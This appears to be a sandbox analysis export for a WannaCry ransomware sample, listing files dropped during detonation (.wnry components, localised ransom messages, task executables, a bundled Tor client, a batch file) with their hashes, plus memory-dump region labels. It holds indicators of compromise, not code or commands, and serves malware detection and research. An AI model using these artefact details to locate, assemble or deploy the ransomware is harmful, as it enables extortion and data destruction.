SHA256 4159db70423d4da0cb3e343be29667abba8279ebedbf60e21c266102ee632b73
SHA512 775a767145ba6264589a1f86b12b65b0d8d1f5f2b1e932256ac05b802e53d94fa313be694f8aab9f49bfd26c92ff2e0520e92fa72a37405ae2df686e5745fc9f

C:\Users\Admin\Downloads\WannaCrypt0r (1).zip.crdownload

MD5 e58fdd8b0ce47bcb8ffd89f4499d186d
SHA1 b7e2334ac6e1ad75e3744661bb590a2d1da98b03
SHA256 283f40e9d550833bec101a24fd6fd6fbd9937ed32a51392e818ffff662a1d30a
SHA512 95b6567b373efa6aec6a9bfd7af70ded86f8c72d3e8ba75f756024817815b830f54d18143b0be6de335dd0ca0afe722f88a4684663be5a84946bd30343d43a8c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 aa6783005a2bc57450786cefe456f7b6
SHA1 9889d72cf70c225166088943c21429f8b5adbcfd
SHA256 ea6045458d84f911f1e0942022eb3eb61e74d0d7fbdc7a13ca2988bfbee3168f
SHA512 7dcc0e178e9b7a3e8cbafd00319d8e7d177269c4fa138720e3b04df5cf3ae6840e79866edc05d445ea3be225a6cef71d4c7d5210c22f7f3ac23150a774ca1929

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 d6e457c8dc52cf83041665f5da91a59c
SHA1 2015180c336316c6fbac26c79c43a917b3fdf5d0
SHA256 e4ca6bf7671d6ce2806a17fcaf8d8ff78460ae2f7537c53adacb24fb3a0fd510
SHA512 38a98ff8c2c9b6143a7bfa9b33ef6b1fb020b63d324c53387fcbda4dc4c8ff73ea284f715b4f9c350b09ca20fdb2561069ec656d6b93efc55660d44b205b43c8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\72317928-cc36-4d20-8c1f-4b8f30e69b00.tmp

MD5 b0e57cd53c1c6ff41f12fcf811f92f45
SHA1 42ce05eb94855ff2f62eaf449552361927fe93b2
SHA256 795c15f66449b05b47862acf51c58f8d57b1b258c5aab9fd9f373567651e8e79
SHA512 5cec35c55be50714ab82adbc1b3bf1c76e732bb020f4f51dc93db0bca3c8a92893a458e7306f3960ec0c038576179f4285c3a54a6bfc2974a02825115bc7f4ea

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 f0f7c1467521383de2f27349379cfad7
SHA1 e24725073c2a136e372b96bf73292588f96b73f6
SHA256 ad49e4bd4387ef10fa6cd959ed3355d6d54b4299d1bca86964c64da7c8e84a1a
SHA512 7655e9036efe5cca34267b4ad31a94f0fe971991327fef150a7013a71b5013f9f4bad91eb752b90d43b34d322bcd740568689cfd15f8c9191a06f6fe87f9dbfb

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\f7b4a2d8-a9d4-4e13-8f4e-a96d4c2975da.tmp

MD5 e902369765e785aa38542c1a08d572bf
SHA1 723c689d1fb39f49b88426285ec082db2bf446d4
SHA256 da425580ab7f9d53d64e1a8e36bb972b634a2b9719e0741a94abff9b63fd586e
SHA512 81970b631d6c5f5250c4d2af96594009559c7f9ca3f081eb545d01d0db7a010921f02b9f68c4d5a5664092f262d2a5dd6c8597b379c32f6547860e43e95f2817

C:\Users\Admin\Desktop\WannaCrypt0r\msg\m_finnish.wnry

MD5 35c2f97eea8819b1caebd23fee732d8f
SHA1 e354d1cc43d6a39d9732adea5d3b0f57284255d2
SHA256 1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e
SHA512 908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

memory/2624-9992-0x0000000010000000-0x0000000010010000-memory.dmp

C:\Users\Admin\Desktop\WannaCrypt0r\u.wnry

MD5 7bf2b57f2a205768755c07f238fb32cc
SHA1 45356a9dd616ed7161a3b9192e2f318d0ab5ad10
SHA256 b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25
SHA512 91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

C:\Users\Admin\Desktop\WannaCrypt0r\taskse.exe

MD5 8495400f199ac77853c53b5a3f278f3e
SHA1 be5d6279874da315e3080b06083757aad9b32c23
SHA256 2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d
SHA512 0669c524a295a049fa4629b26f89788b2a74e1840bcdc50e093a0bd40830dd1279c9597937301c0072db6ece70adee4ace67c3c8a4fb2db6deafd8f1e887abe4

C:\Users\Admin\Desktop\WannaCrypt0r\taskdl.exe

MD5 4fef5e34143e646dbf9907c4374276f5
SHA1 47a9ad4125b6bd7c55e4e7da251e23f089407b8f
SHA256 4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79
SHA512 4550dd1787deb353ebd28363dd2cdccca861f6a5d9358120fa6aa23baa478b2a9eb43cef5e3f6426f708a0753491710ac05483fac4a046c26bec4234122434d5

C:\Users\Admin\Desktop\WannaCrypt0r\t.wnry

MD5 5dcaac857e695a65f5c3ef1441a73a8f
SHA1 7b10aaeee05e7a1efb43d9f837e9356ad55c07dd
SHA256 97ebce49b14c46bebc9ec2448d00e1e397123b256e2be9eba5140688e7bc0ae6
SHA512 06eb5e49d19b71a99770d1b11a5bb64a54bf3352f36e39a153469e54205075c203b08128dc2317259db206ab5323bdd93aaa252a066f57fb5c52ff28deedb5e2

C:\Users\Admin\Desktop\WannaCrypt0r\s.wnry

MD5 ad4c9de7c8c40813f200ba1c2fa33083
SHA1 d1af27518d455d432b62d73c6a1497d032f6120e
SHA256 e18fdd912dfe5b45776e68d578c3af3547886cf1353d7086c8bee037436dff4b
SHA512 115733d08e5f1a514808a20b070db7ff453fd149865f49c04365a8c6502fa1e5c3a31da3e21f688ab040f583cf1224a544aea9708ffab21405dde1c57f98e617

C:\Users\Admin\Desktop\WannaCrypt0r\r.wnry

MD5 3e0020fc529b1c2a061016dd2469ba96
SHA1 c3a91c22b63f6fe709e7c29cafb29a2ee83e6ade
SHA256 402751fa49e0cb68fe052cb3db87b05e71c1d950984d339940cf6b29409f2a7c
SHA512 5ca3c134201ed39d96d72911c0498bae6f98701513fd7f1dc8512819b673f0ea580510fa94ed9413ccc73da18b39903772a7cbfa3478176181cee68c896e14cf

C:\Users\Admin\Desktop\WannaCrypt0r\msg\m_vietnamese.wnry

MD5 8419be28a0dcec3f55823620922b00fa
SHA1 2e4791f9cdfca8abf345d606f313d22b36c46b92
SHA256 1f21838b244c80f8bed6f6977aa8a557b419cf22ba35b1fd4bf0f98989c5bdf8
SHA512 8fca77e54480aea3c0c7a705263ed8fb83c58974f5f0f62f12cc97c8e0506ba2cdb59b70e59e9a6c44dd7cde6adeeec35b494d31a6a146ff5ba7006136ab9386

C:\Users\Admin\Desktop\WannaCrypt0r\msg\m_turkish.wnry

MD5 531ba6b1a5460fc9446946f91cc8c94b
SHA1 cc56978681bd546fd82d87926b5d9905c92a5803
SHA256 6db650836d64350bbde2ab324407b8e474fc041098c41ecac6fd77d632a36415
SHA512 ef25c3cf4343df85954114f59933c7cc8107266c8bcac3b5ea7718eb74dbee8ca8a02da39057e6ef26b64f1dfccd720dd3bf473f5ae340ba56941e87d6b796c9

C:\Users\Admin\Desktop\WannaCrypt0r\msg\m_swedish.wnry

MD5 c7a19984eb9f37198652eaf2fd1ee25c
SHA1 06eafed025cf8c4d76966bf382ab0c5e1bd6a0ae
SHA256 146f61db72297c9c0facffd560487f8d6a2846ecec92ecc7db19c8d618dbc3a4
SHA512 43dd159f9c2eac147cbff1dda83f6a83dd0c59d2d7acac35ba8b407a04ec9a1110a6a8737535d060d100ede1cb75078cf742c383948c9d4037ef459d150f6020

C:\Users\Admin\Desktop\WannaCrypt0r\msg\m_spanish.wnry

MD5 8d61648d34cba8ae9d1e2a219019add1
SHA1 2091e42fc17a0cc2f235650f7aad87abf8ba22c2
SHA256 72f20024b2f69b45a1391f0a6474e9f6349625ce329f5444aec7401fe31f8de1
SHA512 68489c33ba89edfe2e3aebaacf8ef848d2ea88dcbef9609c258662605e02d12cfa4ffdc1d266fc5878488e296d2848b2cb0bbd45f1e86ef959bab6162d284079

C:\Users\Admin\Desktop\WannaCrypt0r\msg\m_slovak.wnry

MD5 c911aba4ab1da6c28cf86338ab2ab6cc
SHA1 fee0fd58b8efe76077620d8abc7500dbfef7c5b0
SHA256 e64178e339c8e10eac17a236a67b892d0447eb67b1dcd149763dad6fd9f72729
SHA512 3491ed285a091a123a1a6d61aafbb8d5621ccc9e045a237a2f9c2cf6049e7420eb96ef30fdcea856b50454436e2ec468770f8d585752d73fafd676c4ef5e800a

C:\Users\Admin\Desktop\WannaCrypt0r\msg\m_russian.wnry

MD5 452615db2336d60af7e2057481e4cab5
SHA1 442e31f6556b3d7de6eb85fbac3d2957b7f5eac6
SHA256 02932052fafe97e6acaaf9f391738a3a826f5434b1a013abbfa7a6c1ade1e078
SHA512 7613dc329abe7a3f32164c9a6b660f209a84b774ab9c008bf6503c76255b30ea9a743a6dc49a8de8df0bcb9aea5a33f7408ba27848d9562583ff51991910911f

C:\Users\Admin\Desktop\WannaCrypt0r\msg\m_romanian.wnry

MD5 313e0ececd24f4fa1504118a11bc7986
SHA1 e1b9ae804c7fb1d27f39db18dc0647bb04e75e9d
SHA256 70c0f32ed379ae899e5ac975e20bbbacd295cf7cd50c36174d2602420c770ac1
SHA512 c7500363c61baf8b77fce796d750f8f5e6886ff0a10f81c3240ea3ad4e5f101b597490dea8ab6bd9193457d35d8fd579fce1b88a1c8d85ebe96c66d909630730

C:\Users\Admin\Desktop\WannaCrypt0r\msg\m_portuguese.wnry

MD5 fa948f7d8dfb21ceddd6794f2d56b44f
SHA1 ca915fbe020caa88dd776d89632d7866f660fc7a
SHA256 bd9f4b3aedf4f81f37ec0a028aabcb0e9a900e6b4de04e9271c8db81432e2a66
SHA512 0d211bfb0ae953081dca00cd07f8c908c174fd6c47a8001fadc614203f0e55d9fbb7fa9b87c735d57101341ab36af443918ee00737ed4c19ace0a2b85497f41a

C:\Users\Admin\Desktop\WannaCrypt0r\msg\m_polish.wnry

MD5 e79d7f2833a9c2e2553c7fe04a1b63f4
SHA1 3d9f56d2381b8fe16042aa7c4feb1b33f2baebff
SHA256 519ad66009a6c127400c6c09e079903223bd82ecc18ad71b8e5cd79f5f9c053e
SHA512 e0159c753491cac7606a7250f332e87bc6b14876bc7a1cf5625fa56ab4f09c485f7b231dd52e4ff0f5f3c29862afb1124c0efd0741613eb97a83cbe2668af5de

C:\Users\Admin\Desktop\WannaCrypt0r\msg\m_norwegian.wnry

MD5 ff70cc7c00951084175d12128ce02399
SHA1 75ad3b1ad4fb14813882d88e952208c648f1fd18
SHA256 cb5da96b3dfcf4394713623dbf3831b2a0b8be63987f563e1c32edeb74cb6c3a
SHA512 f01df3256d49325e5ec49fd265aa3f176020c8ffec60eb1d828c75a3fa18ff8634e1de824d77dfdd833768acff1f547303104620c70066a2708654a07ef22e19

C:\Users\Admin\Desktop\WannaCrypt0r\msg\m_latvian.wnry

MD5 c33afb4ecc04ee1bcc6975bea49abe40
SHA1 fbea4f170507cde02b839527ef50b7ec74b4821f
SHA256 a0356696877f2d94d645ae2df6ce6b370bd5c0d6db3d36def44e714525de0536
SHA512 0d435f0836f61a5ff55b78c02fa47b191e5807a79d8a6e991f3115743df2141b3db42ba8bdad9ad259e12f5800828e9e72d7c94a6a5259312a447d669b03ec44

C:\Users\Admin\Desktop\WannaCrypt0r\msg\m_korean.wnry

MD5 6735cb43fe44832b061eeb3f5956b099
SHA1 d636daf64d524f81367ea92fdafa3726c909bee1
SHA256 552aa0f82f37c9601114974228d4fc54f7434fe3ae7a276ef1ae98a0f608f1d0
SHA512 60272801909dbba21578b22c49f6b0ba8cd0070f116476ff35b3ac8347b987790e4cc0334724244c4b13415a246e77a577230029e4561ae6f04a598c3f536c7e

C:\Users\Admin\Desktop\WannaCrypt0r\msg\m_japanese.wnry

MD5 b77e1221f7ecd0b5d696cb66cda1609e
SHA1 51eb7a254a33d05edf188ded653005dc82de8a46
SHA256 7e491e7b48d6e34f916624c1cda9f024e86fcbec56acda35e27fa99d530d017e
SHA512 f435fd67954787e6b87460db026759410fbd25b2f6ea758118749c113a50192446861a114358443a129be817020b50f21d27b1ebd3d22c7be62082e8b45223fc

C:\Users\Admin\Desktop\WannaCrypt0r\msg\m_italian.wnry

MD5 30a200f78498990095b36f574b6e8690
SHA1 c4b1b3c087bd12b063e98bca464cd05f3f7b7882
SHA256 49f2c739e7d9745c0834dc817a71bf6676ccc24a4c28dcddf8844093aab3df07
SHA512 c0da2aae82c397f6943a0a7b838f60eeef8f57192c5f498f2ecf05db824cfeb6d6ca830bf3715da7ee400aa8362bd64dc835298f3f0085ae7a744e6e6c690511

C:\Users\Admin\Desktop\WannaCrypt0r\msg\m_indonesian.wnry

MD5 3788f91c694dfc48e12417ce93356b0f
SHA1 eb3b87f7f654b604daf3484da9e02ca6c4ea98b7
SHA256 23e5e738aad10fb8ef89aa0285269aff728070080158fd3e7792fe9ed47c51f4
SHA512 b7dd9e6dc7c2d023ff958caf132f0544c76fae3b2d8e49753257676cc541735807b4befdf483bcae94c2dcde3c878c783b4a89dca0fecbc78f5bbf7c356f35cd

C:\Users\Admin\Desktop\WannaCrypt0r\msg\m_greek.wnry

MD5 fb4e8718fea95bb7479727fde80cb424
SHA1 1088c7653cba385fe994e9ae34a6595898f20aeb
SHA256 e13cc9b13aa5074dc45d50379eceb17ee39a0c2531ab617d93800fe236758ca9
SHA512 24db377af1569e4e2b2ebccec42564cea95a30f1ff43bcaf25a692f99567e027bcef4aacef008ec5f64ea2eef0c04be88d2b30bcadabb3919b5f45a6633940cb

C:\Users\Admin\Desktop\WannaCrypt0r\msg\m_german.wnry

MD5 3d59bbb5553fe03a89f817819540f469
SHA1 26781d4b06ff704800b463d0f1fca3afd923a9fe
SHA256 2adc900fafa9938d85ce53cb793271f37af40cf499bcc454f44975db533f0b61
SHA512 95719ae80589f71209bb3cb953276538040e7111b994d757b0a24283aefe27aadbbe9eef3f1f823ce4cabc1090946d4a2a558607ac6cac6faca5971529b34dac

C:\Users\Admin\Desktop\WannaCrypt0r\msg\m_french.wnry

MD5 4e57113a6bf6b88fdd32782a4a381274
SHA1 0fccbc91f0f94453d91670c6794f71348711061d
SHA256 9bd38110e6523547aed50617ddc77d0920d408faeed2b7a21ab163fda22177bc
SHA512 4f1918a12269c654d44e9d394bc209ef0bc32242be8833a2fba437b879125177e149f56f2fb0c302330dec328139b34982c04b3fefb045612b6cc9f83ec85aa9

C:\Users\Admin\Desktop\WannaCrypt0r\msg\m_filipino.wnry

MD5 08b9e69b57e4c9b966664f8e1c27ab09
SHA1 2da1025bbbfb3cd308070765fc0893a48e5a85fa
SHA256 d8489f8c16318e524b45de8b35d7e2c3cd8ed4821c136f12f5ef3c9fc3321324
SHA512 966b5ed68be6b5ccd46e0de1fa868cfe5432d9bf82e1e2f6eb99b2aef3c92f88d96f4f4eec5e16381b9c6db80a68071e7124ca1474d664bdd77e1817ec600cb4

C:\Users\Admin\Desktop\WannaCrypt0r\msg\m_english.wnry

MD5 fe68c2dc0d2419b38f44d83f2fcf232e
SHA1 6c6e49949957215aa2f3dfb72207d249adf36283
SHA256 26fd072fda6e12f8c2d3292086ef0390785efa2c556e2a88bd4673102af703e5
SHA512 941fa0a1f6a5756ed54260994db6158a7ebeb9e18b5c8ca2f6530c579bc4455918df0b38c609f501ca466b3cc067b40e4b861ad6513373b483b36338ae20a810

C:\Users\Admin\Desktop\WannaCrypt0r\msg\m_dutch.wnry

MD5 7a8d499407c6a647c03c4471a67eaad7
SHA1 d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b
SHA256 2c95bef914da6c50d7bdedec601e589fbb4fda24c4863a7260f4f72bd025799c
SHA512 608ef3ff0a517fe1e70ff41aeb277821565c5a9bee5103aa5e45c68d4763fce507c2a34d810f4cd242d163181f8341d9a69e93fe32aded6fbc7f544c55743f12

C:\Users\Admin\Desktop\WannaCrypt0r\msg\m_danish.wnry

MD5 2c5a3b81d5c4715b7bea01033367fcb5
SHA1 b548b45da8463e17199daafd34c23591f94e82cd
SHA256 a75bb44284b9db8d702692f84909a7e23f21141866adf3db888042e9109a1cb6
SHA512 490c5a892fac801b853c348477b1140755d4c53ca05726ac19d3649af4285c93523393a3667e209c71c80ac06ffd809f62dd69ae65012dcb00445d032f1277b3

C:\Users\Admin\Desktop\WannaCrypt0r\msg\m_czech.wnry

MD5 537efeecdfa94cc421e58fd82a58ba9e
SHA1 3609456e16bc16ba447979f3aa69221290ec17d0
SHA256 5afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150
SHA512 e007786ffa09ccd5a24e5c6504c8de444929a2faaafad3712367c05615b7e1b0fbf7fbfff7028ed3f832ce226957390d8bf54308870e9ed597948a838da1137b

C:\Users\Admin\Desktop\WannaCrypt0r\msg\m_croatian.wnry

MD5 17194003fa70ce477326ce2f6deeb270
SHA1 e325988f68d327743926ea317abb9882f347fa73
SHA256 3f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171
SHA512 dcf4ccf0b352a8b271827b3b8e181f7d6502ca0f8c9dda3dc6e53441bb4ae6e77b49c9c947cc3ede0bf323f09140a0c068a907f3c23ea2a8495d1ad96820051c

C:\Users\Admin\Desktop\WannaCrypt0r\msg\m_chinese (traditional).wnry

MD5 2efc3690d67cd073a9406a25005f7cea
SHA1 52c07f98870eabace6ec370b7eb562751e8067e9
SHA256 5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a
SHA512 0766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c

C:\Users\Admin\Desktop\WannaCrypt0r\msg\m_chinese (simplified).wnry

MD5 0252d45ca21c8e43c9742285c48e91ad
SHA1 5c14551d2736eef3a1c1970cc492206e531703c1
SHA256 845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a
SHA512 1bfcf6c0e7c977d777f12bd20ac347630999c4d99bd706b40de7ff8f2f52e02560d68093142cc93722095657807a1480ce3fb6a2e000c488550548c497998755

C:\Users\Admin\Desktop\WannaCrypt0r\msg\m_bulgarian.wnry

MD5 95673b0f968c0f55b32204361940d184
SHA1 81e427d15a1a826b93e91c3d2fa65221c8ca9cff
SHA256 40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd
SHA512 7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

C:\Users\Admin\Desktop\WannaCrypt0r\[email protected]

MD5 84c82835a5d21bbcf75a61706d8ab549
SHA1 5ff465afaabcbf0150d1a3ab2c2e74f3a4426467
SHA256 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
SHA512 90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

C:\Users\Admin\Desktop\WannaCrypt0r\c.wnry

MD5 93f33b83f1f263e2419006d6026e7bc1
SHA1 1a4b36c56430a56af2e0ecabd754bf00067ce488
SHA256 ef0ed0b717d1b956eb6c42ba1f4fd2283cf7c8416bed0afd1e8805ee0502f2b4
SHA512 45bdd1a9a3118ee4d3469ee65a7a8fdb0f9315ca417821db058028ffb0ed145209f975232a9e64aba1c02b9664c854232221eb041d09231c330ae510f638afac

C:\Users\Admin\Desktop\WannaCrypt0r\b.wnry

MD5 c17170262312f3be7027bc2ca825bf0c
SHA1 f19eceda82973239a1fdc5826bce7691e5dcb4fb
SHA256 d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa
SHA512 c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

C:\Users\Admin\Desktop\WannaCrypt0r\146601726389075.bat

MD5 fc70e1442ac76ca102383c0d0bb4f68d
SHA1 1763b284a2d5f3a74cf225736ea0e9f3bd3f4fd9
SHA256 1b75b519c51f7a849b538415aea4d41e9acabefc2d159151704898233215f79d
SHA512 0bab1b8bb0ce541d958c3f66853091d111180b3b61e2b67e4e6849329bf7ee1ff06506ef8cb3f995ecd4f8db1cece18c9737469b3a6e48d590fe8b2baba9c0a9

C:\Users\Admin\Desktop\WannaCrypt0r\@[email protected]

MD5 7e6b6da7c61fcb66f3f30166871def5b
SHA1 00f699cf9bbc0308f6e101283eca15a7c566d4f9
SHA256 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e
SHA512 e5a56137f325904e0c7de1d0df38745f733652214f0cdb6ef173fa0743a334f95bed274df79469e270c9208e6bdc2e6251ef0cdd81af20fa1897929663e2c7d3

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\@[email protected]

MD5 379ba3726ef7243e08411f7b7344fecc
SHA1 05b9c0c2575f004d7c4bd2b9676452d6cc6108cd
SHA256 835896c605b42f9ab6ad95f3d8eb9c45bd6e2d4a1521231a91bb30bd708c9fb3
SHA512 7718e9ede013219187e63c7411102401a48522ddd62617d4478ae72e70975bffbb68460a0067b83154d170db8a88e9102e709ceefd32c8ab79e6ec7fcd3ca925

C:\Users\Admin\Desktop\WannaCrypt0r\TaskData\Tor\taskhsvc.exe

MD5 fe7eb54691ad6e6af77f8a9a0b6de26d
SHA1 53912d33bec3375153b7e4e68b78d66dab62671a
SHA256 e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb
SHA512 8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

memory/1436-10978-0x0000000074910000-0x0000000074932000-memory.dmp

memory/1436-10977-0x0000000074940000-0x00000000749C2000-memory.dmp

memory/1436-10975-0x0000000074C90000-0x0000000074D12000-memory.dmp

memory/1436-10976-0x00000000749D0000-0x0000000074BEC000-memory.dmp

memory/1436-10979-0x00000000008B0000-0x0000000000BAE000-memory.dmp

memory/2624-10982-0x0000000000400000-0x000000000075A000-memory.dmp

memory/1436-10984-0x0000000074C90000-0x0000000074D12000-memory.dmp

memory/1436-10989-0x0000000074910000-0x0000000074932000-memory.dmp

memory/1436-10988-0x0000000074940000-0x00000000749C2000-memory.dmp

memory/1436-10987-0x00000000749D0000-0x0000000074BEC000-memory.dmp

memory/1436-10986-0x0000000074BF0000-0x0000000074C67000-memory.dmp

memory/1436-10985-0x0000000074C70000-0x0000000074C8C000-memory.dmp

memory/1436-10983-0x00000000008B0000-0x0000000000BAE000-memory.dmp

memory/1436-10991-0x00000000008B0000-0x0000000000BAE000-memory.dmp

memory/1436-11013-0x00000000008B0000-0x0000000000BAE000-memory.dmp

memory/1436-11017-0x00000000749D0000-0x0000000074BEC000-memory.dmp

C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new

MD5 9e8d1f6087a6be80edc56b5e20c12663
SHA1 0018ba6654815dfa7ed71433d721a19b6d8d1293
SHA256 20ba6fff56e142b3b84a42927613ba2759975b6a82a9b56239c68b665a43fe78
SHA512 0249a71d3532a476f173fbdcc63bf064c6450df6773bb5eaae2d6698cc82def57297063af2a5bedf9273fbc493248791e8e5fbbccf363f82ed12c66fcf706150

memory/1436-11037-0x00000000008B0000-0x0000000000BAE000-memory.dmp

memory/1436-11041-0x00000000749D0000-0x0000000074BEC000-memory.dmp

memory/1436-11046-0x00000000008B0000-0x0000000000BAE000-memory.dmp

memory/1436-11100-0x00000000008B0000-0x0000000000BAE000-memory.dmp

memory/1436-11109-0x00000000008B0000-0x0000000000BAE000-memory.dmp